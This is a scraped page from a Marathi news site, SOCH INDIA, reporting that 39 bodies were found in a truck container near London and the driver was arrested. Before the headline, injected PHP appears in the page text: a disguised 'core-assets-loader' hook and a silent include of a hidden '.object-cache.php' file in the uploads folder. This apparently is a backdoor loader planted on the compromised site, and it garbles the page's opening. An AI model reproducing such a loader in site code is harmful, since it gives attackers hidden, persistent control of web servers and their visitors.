add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ट्रकच्या कंटेनरमध्ये सापडले ३९ मृतदेह; धक्कादायक घटनेने लंडनमध्ये खळबळ – SOCH INDIA
Menu

अपराध समाचार
ट्रकच्या कंटेनरमध्ये सापडले ३९ मृतदेह; धक्कादायक घटनेने लंडनमध्ये खळबळ

nobanner

एका ट्रक कन्टेनरमध्ये ३९ जणांचे मृतदेह पोलिसांना आढळून आल्याने लंडनमध्ये खळबळ उडाली आहे. पूर्व लंडनमधील औद्योगिक वसाहतीत बुधवारी ही धक्कादायक घटना समोर आली. या हत्यांकांडप्रकरणी पोलिसांनी संबंधित २५ वर्षीय ट्रक ड्रायव्हरला अटक केली आहे.

मुख्य पोलीस अधीक्षक अॅन्ड्र्यू मरिनर यांच्या माहितीनुसार, हा ट्रक बल्गेरियातून वेल्समधील हॉलिहेड येथे शनिवारी दाखल झाला आसावा, असा प्राथमिक अंदाज आहे. मृतांची ओळख पटवण्याचे काम सुरु असून एकूणच गंभीर प्रकरण पाहता याला थोडा अधिक वेळ लागू शकतो.

याप्रकरणी ट्रकच्या ड्रायव्हरला अटक करण्यात आली असून त्याची रवानगी पोलीस कोठडीत करण्यात आली आहे. आपत्कालीन दलाच्या माहितीनुसार, मध्य लंडनपासून २० माईल्स अंतरावर असलेल्या थेम्स नदीजवळील ग्रेजच्या वॉटरग्लेड या औद्योगिक वसाहतीत असलेल्या एका ट्रकच्या कंटेनरमध्ये हे मृतदेह आढळून आले आहेत. या ३९ मृतदेहांपैकी ३८ प्रौढांचे तर १ मृतदेह अल्पवयीन व्यक्तीचा आहे.